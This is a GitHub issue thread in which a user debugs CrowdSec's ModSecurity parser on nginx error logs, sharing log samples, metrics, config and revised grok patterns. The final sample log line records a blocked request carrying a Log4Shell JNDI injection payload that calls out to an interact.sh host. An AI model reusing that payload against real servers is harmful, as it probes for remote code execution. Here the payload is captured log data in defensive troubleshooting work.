### ISSUE TITLE
Parser modsecurity and nginx

### ISSUE THREAD

**Issue by cmiscloni** [crowdsecurity/crowdsec#1123]
I have trouble to set up crowdsec with Modsecurity in Nginx logs
It seems that all lines are unparsed in the metrics results, it works with httpd however.

Example of modsecurity log in nginx log file:

`2021/12/23 14:39:01 [error] 3775#3775: *69 [client 86.21.15.42] ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' against variable `TX:ANOMALY_SCORE' (Value: `20' ) [file "/etc/nginx/modsecu/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "80"] [id "949110"] [rev ""] [msg "Inbound Anomaly Score Exceeded (Total Score: 20)"] [data ""] [severity "2"] [ver "OWASP_CRS/3.3.2"] [maturity "0"] [accuracy "0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "192.168.0.1"] [uri "/"] [unique_id "1640266741"] [ref ""], client: 86.21.15.42, server: site.example.com, request: "HEAD / HTTP/1.1", host: "site.example.com"`

+---------------------------------+------+--------+----------+
|             PARSERS             | HITS | PARSED | UNPARSED |
+---------------------------------+------+--------+----------+
| crowdsecurity/modsecurity       |   17 | -      |       17 |
+---------------------------------+------+--------+----------+

filenames:
  - /var/log/nginx/example.error.log
labels:
  type: modsecurity
---

**Comment by cmiscloni** [comment]
Modsecurity patterns are made only for apache ?

```
APACHEERRORTIME %{DAY} %{MONTH} %{MONTHDAY} %{TIME} %{YEAR}
APACHEERRORPREFIX \[%{APACHEERRORTIME:timestamp}\] \[%{NOTSPACE:apacheseverity}\] (\[pid %{INT}:tid %{INT}\] )?\[client %{IPORHOST:sourcehost}(:%{INT:source_port})?\] (\[client %{IPORHOST}\])?
GENERICAPACHEERROR %{APACHEERRORPREFIX} %{GREEDYDATA:message}
MODSECPREFIX %{APACHEERRORPREFIX} ModSecurity: %{NOTSPACE:modsecseverity}\. %{GREEDYDATA:modsecmessage}
```

**Comment by cmiscloni** [comment]
I had to change the pattern like this:

`MODSECNGINXPREFIX: "%{NGINXERRORPREFIX}\\[client %{IPORHOST}\\] ModSecurity: (%{NOTSPACE:modsecseverity}\\. )?%{GREEDYDATA:modsecmessage}"`

Add a `\\[client %{IPORHOST}\\] `

**Comment by cmiscloni** [comment]
`client: %{IPORHOST:remote_addr}, server: %{DATA:target_fqdn}, request: \"%{WORD:verb} %{URIPATHPARAM:request} HTTP/%{NUMBER:http_version}\", host: \"%{DATA:IPORHOST}`**(:%{INT})?**

Sometime, ip or hostname came with port number, maybe modify grok pattern like this .

**Comment by blotus** [comment]
Hello @cmiscloni,

Could you share some sample logs ?

And just to be sure, are you running the latest crowdsec version, and the latest version of the modsec parser (run `cscli hub update && cscli hub upgrade` to update it) ?

**Comment by cmiscloni** [comment]
Hello @blotus, yes  I have the latest version of crowdsec and his modules.

`2021/12/26 12:36:51 [error] 972#972: *18722 [client 161.97.102.240] ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' against variable `TX:ANOMALY_SCORE' (Value: `370' ) [file "/etc/nginx/modsec/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "80"] [id "949110"] [rev ""] [msg "Inbound Anomaly Score Exceeded (Total Score: 370)"] [data ""] [severity "2"] [ver "OWASP_CRS/3.x.x"] [maturity "0"] [accuracy "0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "192.168.0.1"] [uri "/"] [unique_id "1640518611"] [ref ""], client: 161.97.102.240, server: <ipofserver>, request: "GET /?x=${jndi:ldap://${hostName}.c72643ci97rd1ek9i7u0c8rf8iejf6fk6.interact.sh/a} HTTP/1.1", host: "hostname.domain:443", referrer: "${jndi:ldap://${hostName}.referer.c72643ci97rd1ek9i7u0c8rf8iejf6fms.interact.sh}"`
